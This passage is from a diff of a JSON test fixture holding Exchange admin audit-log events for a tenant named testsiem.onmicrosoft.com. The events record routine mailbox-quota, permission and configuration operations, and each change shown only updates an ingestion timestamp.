bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -6371,7 +6371,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853396500Z", + "ingested": "2021-12-14T14:49:28.056988113Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"a61cdc9a-89ef-402b-102c-08d7ac0f3592\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -6452,7 +6452,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853402300Z", + "ingested": "2021-12-14T14:49:28.056988550Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:04\",\"ExternalAccess\":true,\"Id\":\"5cd5fc38-5b48-47d6-2e47-08d7ac0f2b01\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -6533,7 +6533,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853408Z", + "ingested": "2021-12-14T14:49:28.056989011Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:21\",\"ExternalAccess\":true,\"Id\":\"ff48ffeb-5c2a-468f-9113-08d7ac0f3512\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -6614,7 +6614,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853413700Z", + "ingested": "2021-12-14T14:49:28.056989492Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"d16f181c-257c-4d40-45e1-08d7adfc0c02\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -6695,7 +6695,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853420Z", + "ingested": "2021-12-14T14:49:28.056989989Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"02c7f756-40e0-4c47-d49d-08d7ac0f26bd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -6765,7 +6765,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853424100Z", + "ingested": "2021-12-14T14:49:28.056990478Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:21\",\"ExternalAccess\":true,\"Id\":\"86a8ddaf-15d2-44b4-62d5-08d7adfc1062\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\",\"Operation\":\"Add-MailboxPermission\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\"},{\"Name\":\"User\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Discovery Management\"},{\"Name\":\"AccessRights\",\"Value\":\"FullAccess\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -6846,7 +6846,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853428800Z", + "ingested": "2021-12-14T14:49:28.056991062Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"8b544cbd-f42b-4910-82ef-08d7ac0f26fc\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -6927,7 +6927,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853434300Z", + "ingested": "2021-12-14T14:49:28.056991493Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -6996,7 +6996,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853439400Z", + "ingested": "2021-12-14T14:49:28.056991982Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:07\",\"ExternalAccess\":true,\"Id\":\"d7134fa4-2e25-4a7d-d84d-08d7adfc0802\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -7077,7 +7077,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853445200Z", + "ingested": "2021-12-14T14:49:28.056992419Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"ee2a5c48-f068-4672-3e34-08d7adfc0bf4\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -7145,7 +7145,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853449600Z", + "ingested": "2021-12-14T14:49:28.056992860Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:32\",\"ExternalAccess\":true,\"Id\":\"060e0f74-72a7-40d1-30fa-08d7ac0f17d8\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Resource Schema\",\"Operation\":\"Install-ResourceConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Organization\",\"Value\":\"testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -7215,7 +7215,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853454200Z", + "ingested": "2021-12-14T14:49:28.056993338Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:23\",\"ExternalAccess\":true,\"Id\":\"80d8b808-c24c-4359-24cf-08d7adfc11e3\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -7293,7 +7293,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853460100Z", + "ingested": "2021-12-14T14:49:28.056993829Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:42\",\"ExternalAccess\":true,\"Id\":\"27fdc2ec-edbd-445c-92bd-08d7ac0f1dc6\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"UMGrammar\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"MaxSendSize\",\"Value\":\"1 GB (1,073,741,824 bytes)\"},{\"Name\":\"MailRouting\",\"Value\":\"True\"},{\"Name\":\"MessageTracking\",\"Value\":\"True\"},{\"Name\":\"OMEncryption\",\"Value\":\"True\"},{\"Name\":\"OABGen\",\"Value\":\"True\"},{\"Name\":\"ClientExtensions\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted 